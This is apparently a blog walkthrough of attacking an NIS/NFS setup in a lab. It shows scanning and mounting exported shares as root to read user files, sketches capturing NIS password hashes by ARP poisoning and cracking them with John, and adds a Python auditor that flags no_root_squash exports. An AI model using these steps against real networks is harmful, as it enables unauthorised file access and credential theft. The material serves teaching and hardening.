So, okay, I finally got done with YPServ / NIS, and it's just as insecure as it has always been, so let's look at it.
We have a machine on the network, so let's see if we can find a NIS server. Fire up Nmap and have a look around.
nmap 10.0.0.1-255
Nmap scan report for 10.0.0.27
Host is up (0.000041s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
903/tcp open iss-console-mgr
2049/tcp open nfs
MAC Address: 08:00:27:68:EE:7B (Oracle VirtualBox virtual NIC)
So we have a candidate; let's see if we can list some shares.
showmount -e 10.0.0.27
Export list for 10.0.0.27:
/srv/shared 10.0.0.0/24
/home 10.0.0.0/24
We got two shares listed. Now, since we run as root on our Kali box, let's try to mount one directly:
mount -t nfs 10.0.0.27:/srv/shared /media/nx/nfsserver
ls /media/nx/nfsserver
blackdragon devel
So, we got two directories inside the share:
ls /media/nx/nfsserver/blackdragon
aig_test.txt
And we got a user test file.
To unmount, simply do:
umount /media/mountpoint
Why was this possible? Because the server had wrong settings that let us, IF we're running as root on our local machine, mount all exported shares. The problem is that NIS just uses UID / GID, not usernames and passwords, so with root rights on the share and UID/GID 0 on our system, we can mount everything.
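On the server side, the setting that hands remote root full rights is what you want to catch before someone else does. The following is an added example, not code from the post: a small Python auditor for exports(5) files that assumes the "wrong setting" above was no_root_squash (the post does not name it) and flags that, wide-open client lists, and the insecure option. The two exports files are constructed, one weak and one corrected.

```python
import re

# Constructed sample exports files (not from the page): one weak, one corrected.
WEAK_EXPORTS = """\
/srv/shared 10.0.0.0/24(rw,sync,no_root_squash)
/home       10.0.0.0/24(rw,sync,no_root_squash)   # remote root stays root
/tmp/public *(rw)
"""
HARDENED_EXPORTS = """\
/srv/shared 10.0.0.0/24(rw,sync,root_squash,no_subtree_check)
/home       10.0.0.0/24(rw,sync,root_squash,no_subtree_check)
"""

# client spec is "<host-or-network>(opt,opt)"; either part may be absent
CLIENT_RE = re.compile(r"^([^(]*)(?:\(([^)]*)\))?$")

def parse_exports(text):
    """Return (path, client, options) for every client entry in exports(5) syntax."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        specs = parts[1].split() if len(parts) > 1 else []
        for spec in specs or ["*"]:                 # no client listed means every host
            m = CLIENT_RE.match(spec)
            if not m:
                continue                            # unbalanced parentheses, skip
            client = m.group(1) or "*"              # a bare "(rw)" also means every host
            opts = set((m.group(2) or "").split(",")) - {""}
            entries.append((path, client, opts))
    return entries

def audit_exports(text):
    """List exports where remote UID 0 keeps root, or that any host may mount."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append(f"{path} -> {client}: no_root_squash, remote UID 0 is not mapped to nobody")
        if client == "*":
            findings.append(f"{path} -> {client}: exported to every host, no client restriction")
        if "insecure" in opts:
            findings.append(f"{path} -> {client}: insecure, requests from unprivileged ports accepted")
    return findings

if __name__ == "__main__":
    for name, text in (("weak", WEAK_EXPORTS), ("hardened", HARDENED_EXPORTS)):
        print(name, audit_exports(text) or ["no findings"])
```

Run it against a real /etc/exports by reading the file into audit_exports; with root_squash in place, a remote root mounting /srv/shared is mapped to nobody instead of UID 0.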
Could we do something else? Yes. If we're seeing a client and a server, we could simply use ARP poisoning to get the traffic between the server and client, fire up Wireshark, filter for ypserv, and see the raw data flowing between the server and the client. We would get the username and hash in clear text, copy that as plain text from the dump data, and go crack it with John and a good dictionary, like we did in Linux - cracking yescrypt hashes with John.
So, did we learn anything? Yep: don't use NIS unless you really... I mean REALLY trust the machines and users in your network ;)
Much Happy NIS Hacking